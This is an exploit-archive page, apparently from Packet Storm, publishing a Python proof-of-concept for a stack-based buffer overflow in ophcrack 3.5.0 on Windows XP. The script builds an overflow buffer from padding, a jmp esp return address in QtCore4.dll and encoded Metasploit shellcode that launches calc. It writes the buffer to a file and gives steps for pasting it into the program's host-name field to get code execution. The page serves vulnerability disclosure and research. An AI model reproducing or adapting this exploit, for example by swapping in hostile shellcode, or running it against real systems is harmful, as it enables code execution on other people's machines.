what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ophcrack 3.50 Buffer Overflow / Code Execution

Ophcrack 3.50 Buffer Overflow / Code Execution
Posted May 21, 2013
Authored by xis_one | Site ophcrack.sourceforge.net

Ophcrack version 3.5.0 suffers from stack based buffer overflow vulnerability that leads to local code execution.

tags | exploit, overflow, local, code execution
systems | windows
SHA-256 | 85e4c42a672fe0a884bdf1e279ba0680a6f49152f227aadb304bf714bbb09e86

Ophcrack 3.50 Buffer Overflow / Code Execution

Change Mirror Download
# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)

#!/usr/bin/python

#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html



shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x79\x78\x6c\x49\x57\x70"
"\x65\x50\x65\x50\x75\x30\x6e\x69\x7a\x45\x44\x71\x7a\x72\x75"
"\x34\x4e\x6b\x46\x32\x30\x30\x4e\x6b\x56\x32\x34\x4c\x4e\x6b"
"\x36\x32\x54\x54\x4e\x6b\x73\x42\x71\x38\x36\x6f\x48\x37\x32"
"\x6a\x36\x46\x75\x61\x69\x6f\x34\x71\x49\x50\x6e\x4c\x55\x6c"
"\x30\x61\x61\x6c\x45\x52\x44\x6c\x57\x50\x6f\x31\x78\x4f\x56"
"\x6d\x47\x71\x69\x57\x7a\x42\x6a\x50\x31\x42\x46\x37\x4e\x6b"
"\x71\x42\x66\x70\x6e\x6b\x43\x72\x35\x6c\x66\x61\x58\x50\x6e"
"\x6b\x37\x30\x54\x38\x6e\x65\x6f\x30\x31\x64\x53\x7a\x56\x61"
"\x4e\x30\x66\x30\x6e\x6b\x50\x48\x65\x48\x4e\x6b\x30\x58\x65"
"\x70\x46\x61\x7a\x73\x6a\x43\x35\x6c\x43\x79\x6e\x6b\x46\x54"
"\x6e\x6b\x75\x51\x7a\x76\x75\x61\x49\x6f\x66\x51\x6b\x70\x4c"
"\x6c\x49\x51\x68\x4f\x66\x6d\x77\x71\x48\x47\x44\x78\x6b\x50"
"\x62\x55\x7a\x54\x34\x43\x61\x6d\x4a\x58\x67\x4b\x53\x4d\x66"
"\x44\x71\x65\x49\x72\x72\x78\x6e\x6b\x73\x68\x44\x64\x53\x31"
"\x5a\x73\x43\x56\x6e\x6b\x54\x4c\x30\x4b\x4e\x6b\x73\x68\x35"
"\x4c\x56\x61\x4b\x63\x4c\x4b\x66\x64\x6c\x4b\x46\x61\x58\x50"
"\x4f\x79\x32\x64\x56\x44\x54\x64\x73\x6b\x63\x6b\x65\x31\x31"
"\x49\x72\x7a\x62\x71\x49\x6f\x69\x70\x62\x78\x31\x4f\x30\x5a"
"\x6c\x4b\x44\x52\x5a\x4b\x4b\x36\x51\x4d\x53\x5a\x67\x71\x6c"
"\x4d\x4b\x35\x78\x39\x75\x50\x35\x50\x45\x50\x42\x70\x30\x68"
"\x35\x61\x6e\x6b\x42\x4f\x4d\x57\x79\x6f\x69\x45\x4d\x6b\x6b"
"\x4e\x66\x6e\x54\x72\x59\x7a\x43\x58\x59\x36\x4d\x45\x6d\x6d"
"\x4f\x6d\x39\x6f\x5a\x75\x75\x6c\x34\x46\x73\x4c\x57\x7a\x6d"
"\x50\x4b\x4b\x49\x70\x61\x65\x44\x45\x4f\x4b\x61\x57\x74\x53"
"\x32\x52\x52\x4f\x31\x7a\x43\x30\x36\x33\x39\x6f\x49\x45\x50"
"\x63\x65\x31\x32\x4c\x63\x53\x43\x30\x41\x41")

#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]


jmp="\x36\x29\x2a\x6e"
buffer = "A"*497 + jmp + shellcode

print(buffer)

file = open('exploit.txt','w')
file.write(buffer)
file.close()


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close